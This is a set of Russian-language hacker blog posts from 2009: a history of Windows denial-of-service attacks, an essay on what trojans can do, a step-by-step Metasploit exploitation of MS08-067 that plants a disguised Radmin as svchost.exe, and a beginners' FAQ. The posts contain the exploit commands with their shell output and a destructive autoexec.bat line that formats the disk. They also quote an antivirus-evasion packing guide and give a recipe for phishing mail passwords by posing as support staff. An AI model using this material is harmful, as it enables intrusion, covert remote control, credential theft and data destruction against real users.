7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.
В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.

В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.

В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.

Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.
Часто атаки комбинируются. Например, Land & IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)

Что такое трояны?

2009-03-20T02:58:00.000-07:00

Дамы и господа! С опозданием на год я все-таки решил написать для Вас эту статью. Написать просто из уважения к Вам. Не в обиду будет сказано, но большинство так называемых "пользователей" персональных компьютеров на самом деле ОЧЕНЬ мало понимают работу САМИХ компьютеров. Дело даже не в том, что кто-то чего-то не знает... Скажите, зачем например, юристу, менеджеру, доктору наук или врачу ДОСКОНАЛЬНО знать все тонкости работы компьютера? У этих людей, как правило, своя специфика, они гораздо больше знают в другой области наук. Знать принципы работы компьютера, высшую математику, десяток языков программирования, сетевые протоколы, несколько операционных систем, принципы атаки и защиты на компьютеры этим людям совсем необязательно. Но по роду своих занятий, по своей работе такие люди вынуждены использовать вычислительную технику хотя бы потому, что это достаточно удобно. Но что именно удобно, благодаря чему использовать компьютеры стало удобно? Позволю себе высказать свою точку зрения. Если кто-то со мной не согласен, то мы обсудим это по e-mail.

Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...

Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).

А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...

Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...

Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).

Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.

Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.

Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.

Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?

Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".

Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.

Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...

Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...

Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:>nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.

Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...

Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)

Получение копии вашего экрана. Без комментариев.

Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)

Поменять кнопки мышки местами. (Тоже издевательство.)

Контроль координат курсора мыши (ой, мышка сама ездит???)

Открыть/закрыть CD-ROM. (Оооочень забавно...)

Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)

Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)

Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...

Узнать, какие программы у вас запущены.

Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)

Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)

Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)

Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)

Выключить или перезагрузить компьютер. (Без комментариев.)

Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)

Если у вас подключен микрофон, то можно услышать вас.

Если у вас есть Web-Camera, то можно и увидеть вас.

Если у вас слишком громко играет музыка, то можно ее вам убавить.

Или наоборот, проиграть на вашей машине звуковой файл...

А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.

Можно диалоговые окошки выводить. Вот такие, например...

Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.

Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...

Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???

В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).

Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...

Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...

Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)

Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.

Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.

А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.

Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...

Вот моя точка зрения, как дальше будут развиваться трояны:

1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.

2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.

3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.

4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.

5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":

"Подготовка вируса к распространению.
1. Как скрыть скомпрессированный файл
2. Как дважды скомпрессировать файл

1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.

Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:

Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.

Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.

Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.

2. Сейчас я расскажу вам, как скомпрессировать файл два раза:
- один раз - Pklite'ом
- второй раз - LZExe

Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."

Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.

Елесин Д.Е.

ВЗЛОМ ПК, под управлением Windows.

2009-03-17T03:06:00.000-07:00

#ВЗЛОМ ПК, под управлением Windows. #

КЛАССИФИКАЦИЯ АТАК.

Атаки на протокол
Атаки на ПО
Атаки на пользователя

ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.

Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.

Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.

Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG

Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG

адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG

Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG

Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG

#УСТАНОВКА СВЯЗИ.#

Необходимый софт:
ФТП — сервер (Serv -U)

Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG

IP адресс 192.168.1.3
Маска подсети 255.255.255.0

Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG

Настраиваем следующим образом:

IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3

Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG

#ПРИМЕР.#

Необходимый софт:

Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)

Сканим комп xspider'ом

http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG

Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.

http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG

use windows/smb/ms08_067_netapi ; наш сплоит

set PAYLOAD generic/shell_bind_tcp ; выбираем начинку

PAYLOAD => generic/shell_bind_tcp

set RHOST 192.168.1.10 ; хост-жертва

RHOST => 192.168.1.10

set LPORT 7777 ; локальный порт

LPORT => 7777

set RPORT 445 ; удаленный порт
RPORT => 445

exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)

Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.

C:WINDOWSsystem32>

Получили командную строку на удаленной системе

{создаем в папке windows, папку helps}
cd c:windows
mkdir helps

{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny

{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir

{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe

{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye

{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe

{устанавливаем Radmin у жертвы}
111.bat

http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG

Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.

http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG

Снял видео, там же и статья отформатированная в pdf:
http://ifolder.ru/10884195
http://kerny-auroras.blogspot.com/2009/03/windows.html

Удачи!

Вопросы новичков, новичкам.

2009-03-13T04:25:00.000-07:00

Это мануал для новичков, так сказать потому что у начинающих очень много общих вопросов, на которые иногда действительно надоедает отвечать! Я надеюсь что в этой статье я соберу самые часто задаваемые вопросы, и постораюсь ответить на все они! А также, буду ориентироватся на помощь новичкам а именно помогу немного разобратся в этот большой и не простой мир хакерства) Для удобности я разделю эту статью на части так как хакерство тоже имеет несколько направлений, а новичкам это будет сложно разберать всё что ему нужно из то что есть) Сегодня поговорим и помогу тем что хотят занятся или нуждаются в взломе и защите. По моему лучше разделить всё ниже представленное на : Часто задаваемые вопросы, Общее образование, Вирусалогия и конечно же Безопастность! Я выбрал именно эти категории так как это самые уязвимые части новичков! Все материалы и статьи ниже представленные с статье, находятся на нашем сайте www.whack.ru Это первая часть статьи. Продолжение следует)!

Часто задаваемые вопросы!
И итак, поговорим о часто задаваемых вопросах! На нашем сайте www.whack.ru
"- С чего начать? - Прочитайте эту статью, и многое станет ясным! Так же проходим квесты сайта, это много влеяет на ваше умение!"
"- Как сменить/скрыть айпи компютера? - Вам поможет прокси серверы! О них читайте чуть ниже!"
"-Как взломать е-майл? - Есть метод СИ и брутфорсер! О них читайте ниже!"
"-Забыл пароль на аську, что делать? - Пользуйтесь системой востановления пароля! Вам нужно только задать тот е-майл который был при регистрации или который сидит в аське! Пройдя всё что сказано на сайте, вы смените пароль на новый!"

Общее образование
Под терменом Общее образование я решил ставить всё что по моему должен каждый знать, вне зависимости от уровня и умения хакерства! Начать с того что такое Интернет будет глупо, так как все это знают, и кстате, щас вы читаете этот мануал через Интернет) Но я уверен что не все знают что такое порты и для чего они или как правельно искать и юзать прокси! По моему, каждый начинающий хакер должен знать хорошо что такое ip и как можно его использовать, независимо от целях! И так, поговорим в начале немного о айпи) IP это адрес компютера или сервера подключенного к Интернету. Он выглядит примерно так: 212.64.79.57. Каждый подключенный к интернету компютер имеет свой уникальный айпи адрес, и он не может быть у другово компютера одновременно! Но вы спросите: а какже быть с айпи адресами которые я видел у себя и на следующий день у друга? Дело в том что все айпи адреса разделяются на две стороны а именно: статистический айпи и меняющейся. Статистические айпи или так сказать выделенные можно иметь только если купить! Они не меняются когда вы заходите в сети. А меняющейся айпишки, они доступны для всех, и таким образом, при каждом входе в Интернет у вас будет другой айпи, хотя бывает что два, три раза под ряд может быть один и тот же айпи. Спросите вы, а что с того что мы знаем про айпи? ГЫ, все удалённые атаки начинаются от айпи адреса, то есть локализации вашей цели. Если не знать айпи цели, ни какой атаки и не может быть! Ну а если спросите как же узнать айпи, то отвечу так: есть онлайн сниферы. Если человек кликнет на ссылку под которым скрывается снифер, вы узнаете его айпи 100% Но если чел будет сидеть через прокси, тогда будет по сложней! По подробней о IP можно читать и учить http://forum.whack.ru/showthread.php?t=728 Про снифферах скожу только одно. Самые простые снифферы способны определить айпи адреса и провайдер, ну а снифферы по сложней, могут красть очень много данных! Подробней о снифферах можно читать http://forum.whack.ru/showthread.php?t=729 Дальше поговорим о прокси. Напоминаю что прокси это одна из очень необходимых утилит для хакера, особенно при атаках! Прокси это промежуточный компютер к которому вы соединяетесь. Дальше, когда вы даёте запросы, они посылаются не сразу к ресурсу (пр. к сайту которому, вам нужна посмотреть фото). Ваш запрос будет в начале отправлен к данному проски серверу(компютеру), он выполняет ваш запрос, получает ответ и посылает его вам обратно в готовом виде)) Таким образом, выходит что этот прокси сервер делает всё за вас. Это скрывает ваш настоящий айпи адрес, и при атаках, вас будет на много сложней вычеслить!! Как искать найти прокси? На нашем форуме: www.forum.whack.ru есть специальный раздел где каждые два три дня выкладываются новые прокси! Также можно юзать программы для прокси. Одна из самых простых это Hide IP. Скачать её можно www.singlewire.110mb.com/hideip.rar После установки и запуска, данная программа сама начнёт искать пркси сервер. Также в ручную можно юзать прокси. Для этого берём рабочий прокси и вставляем в браузер. Скажу что один из лучших и стабильных браузеров это Opera! Это можно делать если поковырятся в настройках браузера. Для оперы нужно Ctrl+F12 - Дополнительно - Сеть - Прокси-серверы и втавляем там. Таким образом, прокси помодет вам работать более безопасно и к тому же, ПРОКСИ ускоряет на 20-30% или даже больше работу в сети!! Ну а если спрашиваете как определить если прокси рабочий или нет, скажу что наша команда Whack Team разработала скрипт который очень легко определяет если прокси рабочие или нет! Подробней вы сможете узнать http://forum.whack.ru/showthread.php?t=1619

Поговорим о видах атаках…
Все должны знать что хакер без атаки это уже не хакер)) Давайте немного проясню что и как в домене атаках). Атаки бывают разные, и каждые более или менее продуктивны! Начнём с самого простого, но достаточного продуктивного! Поговорим о Социальной Инженерии! Между хакерах СИ это начальная стадия в атаке, особенно на е-майлах или icq. Суть атаки при помощи Си в том чтобы напудрить мозги цели, и заставить чела отдать добровольно его пароль)) Пример: Пишите челу на почту с анонимной почты. Для начала, вы напишите как администрация сервака или мыла, что типа вы увеличите обьём почты, но для этого чел должен писатьв ответ его мыло, логин и пароль) Также зарегистрируйте е-майл такой чтобы бил похож на настоящий администраторский е-майл. Пример: support@mail.ru и ваш suport@mail.ru или чтото такое. Не забываем в письме написать второй адрес е-майл для того чтобы чел отправил именно вам его пароль и т.д. Больше о Социальной инженерией можно найти http://forum.whack.ru/forumdisplay.php?f=67 Второй срупенькой атаки это насильный взлом. Если СИ не помог, идём на следующий уровень. Тут многое делает Брут-форсеры. Брут это вид атаки который делается насильным способом! Если вам нужно сломать е-майл, можно применить брутус. НО хапомните что все почтовые сервисы имеют свои отдельные брутусы и нельзя использовать один и тот же Брут к разным почтам!!! На сегодняшний день, хакеры создали Брут-форсеры для наиболее известные почтовые сервисы такие как mail.ru - yandex.ru - pochta.ru - rambler.ru и другие! Работа Брут-форсера состоит в том чтобы переберать пароль. Он делает это с помощью словарей - текстовики с листами возможных паролей. Они состовляются по длине пароля, сложность (буквы, цифры, знакиб т.д.) и по длине. Они могут быть от нескольких кб до Гб! У меня самый большой словари стоит на 4.8 гиг!)) Для брутуса чем больше словарь, тем больше шансы на находку паролей! Но таким образом появляется другая проблема, а именно время затраченное на Брут пароля. Даже если это долгий процесс, это тоже весьма продуктивный вид атаки. Так же есть и другие виды атак как XSS, SQL Injection и другие, НО это новичкам ещё рано знать! К тому же для последних вид атак нужно хорошо знать языки веб прграммирования как: php, java, perl и html. Эти виды атак вы сможете изучать и использовать но чуть пойже, когда наберёте немного опыта в хакерстве!

Вирусалогия
Все слышали о вирусах, но мало кто знает как сложно они создаются. Но не будет мы о этом говорить) Вирусалогия довольно опасная но также продуктивная ступенька в атаке! Вредоносные программы занимают почётное место среди выше напоминаемых вид атак. Вирусы, очень коварные хотя и обычные программы только с изменимым кодом. Они способны поражать всё что находится по близости, а так же только один вид программ и приложений…Всё зависит от фантазии вирусмэйкера) Обычно вирусы заражают файлы .exe .com и другие. Но с расширением и глобализацией сети Интернет, вирусмэйкеры пошли на более коварные методы! Сегодня легко можно подловить вируса если только зайти на обычную веб страницу!!! Такие вирусы заходят на ваш ПК даже не спрашивая вас) Они сами по себе начинают работать, заражать или даже уничтожать всё что встретит! Вирусы также бывают нескольких видов: вирусы заражители, Трояны, бэк-доры(Троян) и другие) Трояны эдни из самых опастных вирусов на сег день! Его можно легко подловить и очень сложно от него избавится! Принцип его действия заключается в том что он внедряется на ваш компютер и сидит там тихо. Ничего не заражает или чтото такое! Но это до тез пор, пока его отец не свяжется с ним) Чтобы понять это, я расскажу так: Троян после настройке и перед отправки к цели, он как бы разделяется на две части. Как ракета в космосе и управление с земли. Так вот, он ждёт пока с ним не свяжется его создатель(первая половина). Когда он с ним связался, тогда начинается чтото очень интересное… Троян имеет полный контроль над вашим компом. Он лего открывает, закрывает окна, программы или чтото другое. Я даже видел как хакер разговаривал с жертвой через блокнот! Вопщем, трой на вашем компе это очень серьёзная проблема.
Защита против вирусов и Троянов это антивирус, файрвол и ваша внимательность! Больше о вирусах и Троянах можно читать на нашем форуме: www.forum.whack.ru а именно здесь http://forum.whack.ru/forumdisplay.php?f=17

Безопасность
